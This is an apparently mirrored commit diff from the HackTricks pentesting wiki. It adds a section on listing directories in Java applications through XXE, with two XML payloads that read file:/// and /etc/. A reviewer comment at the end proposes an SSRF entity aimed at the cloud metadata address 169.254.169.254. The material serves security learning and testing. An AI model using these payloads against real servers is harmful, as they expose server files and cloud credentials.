mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
76100d0b06
commit
77754cb2d9
1 changed files with 12 additions and 0 deletions
@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
![](../.gitbook/assets/image%20%2832%29.png)
### Directory listing
In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like:
```markup
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
<!-- /etc/ -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
```
### SSRF
An XXE could also bu used to abuse a SSRF inside a cloud
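Review bot: the new `### SSRF` subsection at the end of the hunk is unfinished: `An XXE could also bu used to abuse a SSRF inside a cloud` has a typo (`bu` should be `be`), stops without punctuation, and, unlike `### Directory listing`, gives no payload. Suggest finishing the sentence (the external entity can point at an internal HTTP endpoint that only the server can reach) and adding a sample entity such as `<!ENTITY xxe SYSTEM "http://169.254.169.254/">` (the usual cloud metadata address), reflected with the same `&xxe;` inside `<foo>` as in the directory payloads. Minor: in the first listing payload, `<!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]>` declares a DOCTYPE name and element that match nothing in the document; non-validating parsers ignore that, but the second payload's minimal `<!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]>` form is clearer and could be used for both.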